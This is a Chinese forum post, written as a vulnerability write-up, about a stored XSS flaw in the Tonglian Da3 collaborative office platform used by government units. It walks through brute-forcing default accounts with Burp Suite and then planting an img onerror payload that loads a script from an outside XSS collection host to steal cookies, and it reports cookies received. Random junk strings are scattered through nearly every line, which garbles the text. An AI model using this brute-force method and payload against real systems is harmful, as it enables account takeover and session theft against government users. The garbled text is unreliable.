同联Da3协同办公平台后台通用储存型xss漏洞

admin · 发表于 2018-10-20 20:14:15

" O# m5 K& h8 L, I; N 同联Da3协同办公平台后台通用储存型xss漏洞9 L; V4 I" Y: L( H" \6 _

. R: |5 h, J0 q4 O0 p m% m$ j# l( B 平台简介：2 w4 _% R% M! u9 {; Q$ O7 g; [

( J: \* U2 Z3 k8 A3 z2 a7 a + q# f. j1 `' e, v3 N

; N ?2 p5 d+ @1 m 北京同联信息技术有限公司（以下简称同联）由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务，以加强各级政府的精细化、智能化管理，形成高效、敏捷、便民的新型政府。”为使命，致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
5 U7 B; N3 C4 O. T1 [( j3 \' d 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位，分别提供以“移动政务办公”为主的Da3系列管理软件；针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
6 k) _$ ?6 q- v; m 同联本着“协作、专业、创新”的工作方针，为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献！ 1 r# C, j: q$ P) V4 E a

: `7 }) A% a* w, l. W# y 0 @$ P+ `+ w3 p8 K: s2 j. n

3 j! T2 g9 M: i4 R# e/ B 由于此程序为新开发的程序，故能找到的案例并不多，下面附案例地址：2 m( S0 ?" o) x( n/ U- n& p2 T

% P* o' o! f$ u. j0 t : q- X+ j/ y+ n' x' v+ n

/ ]6 K' h, `* ]6 i. z$ |# V http://1.1.1.1:7197/cap-aco/#（案例2-）" S3 B( Y& h7 ~: A/ Y' R0 ^

* e ~ m' C6 u$ {, a http://www.XXOO.com （案例1-官网网站） 8 J+ @3 Q/ @- \! p" A# ]

+ F: @ Q1 \7 D- y, r. L" T5 y8 L 漏洞详情: ; z0 {/ q) g- |0 ~" O9 E$ z

4 |& A, z$ e: N7 a" ? 案例一、 % v0 F; H! t7 a2 ? q8 F

8 |3 {% g. Z2 n6 O 初步确定平台的默认账号为姓名的首字母小写，初始密码为123，为了能够更好的模拟入侵，使用黑盒测试手段进行测试 . Z- t- [( V- i P4 W$ v; o& l

( `1 K( i6 p1 B& Z2 P8 ^1 [ 首先使用burpsuite代理，然后再用黑客字典生成一个全英文小写的3位字典，利用burpsuite进行暴力破解，破解结果如图： 9 Y# k; s8 Y( e- Z2 l! d3 m( H

; @2 R$ ]7 R) D: ^$ o- Z3 H 4 U1 ]$ w2 K2 g8 S0 W9 n

& U9 p4 |& \0 N" Q" J% d, v , v% e: v1 |# O8 V7 }

! Z) j( o1 G: e2 ?" l* m0 ?1 x status为302即表示破解成功，然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞，我在编机器里填写好标题、选择人员，点html如图： 8 z+ M3 p7 T9 q7 g

8 `# ?4 M, X* W' Y- H+ T6 {+ K& x 4 ]2 Q# ^( A" ^! T+ X& s

: D) L6 B2 v7 Y) ~% |$ T2 S. L+ I : o) K* G ]/ |3 ], g3 t

8 _) u% I* E$ p/ C1 O" l) w 然后插我们的xss跨站代码（经过测试发现过滤了好多标签，比如script，没过滤img、iframe标签），这里我们用img标签来测试，payload如下 ) q+ C$ Q! G W5 S& S

@' M% V& c/ c$ c( | ' Y3 E# t T8 ^

7 q4 }* ], e* P/ m <img src=x ' o/ y! e q: F* i/ z" C$ P9 Aonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>，如图： 0 c2 \; _, P) g# G$ c

" C5 c1 W7 L4 Y z6 F! P ! ]' R5 T, [# w U

! j* y* h; w9 f& M8 |& c+ N9 o; z 然后发送，接收cookie如图： 9 N# O) R: z9 q/ O7 N, M& q/ v

. a/ l5 o5 z$ H% f3 Z" f( X% m+ m 9 r; F$ K( s9 w5 K) o4 m$ E

6 O+ r p( S0 A # m7 N- ]* F4 T* d

6 y6 E4 e& J( E6 w0 `% ? 2 f! [% U9 b) ^8 ~& J; o

; `3 C, `( [2 y! b0 I6 f % v9 c2 O: U8 X- L

* S5 e$ @: R) \" D 4 d% f2 G8 E" k q U4 p3 i; }% }

5 l7 O# t/ ^7 ^3 Q P! g3 f. X ; B# Y; C& k' [4 K/ P9 a5 L

* ^5 ~0 Y, ^9 g3 y& D2 l% _, N) k $ Y4 ] H2 U+ n

3 b e- b7 W; B6 }. A) G7 e 案例2、 1 ~6 z5 j( n1 s

: N+ T/ x6 d7 L' q9 i+ D, ] 前面步骤都一样，下面看效果图： * r; _* v8 X6 R7 V0 ~" O- j5 R8 j2 ?( G

# U- k u3 n4 ~* Y- T 2 C& r7 {* _9 e3 X; f$ Z) u( ?. g

. Y' a. D5 ]7 _& Z. a# \ 1 N* S+ D5 i+ ~- K* W0 d; g

4 O6 u2 p& z4 o " j9 J7 E! }2 E, j

]' |- O# b7 o; J- d! z% y ' I9 \1 F# z# {# g' H/ ^9 A! S( \- d

; D1 d8 \, n! e. P& l0 w+ X: D v % j% p) O2 n \9 P2 E" ^* T

! h: u8 ?6 S9 ^ 1 x( \; q+ X* f1 s

( i2 n6 x% @* S8 U 3 `# P4 S' H, `: ]: K- A2 A

6 B( [* p: `4 s! { ! M& |, Y9 \& v8 C; t, P

6 z- o7 y3 ?9 s6 o# x/ Y8 b" U8 A$ M8 ] , F1 `6 V& p! o# E- O9 P

		自动登录	找回密码
密码			立即注册

同联Da3协同办公平台后台通用储存型xss漏洞

浏览过的版块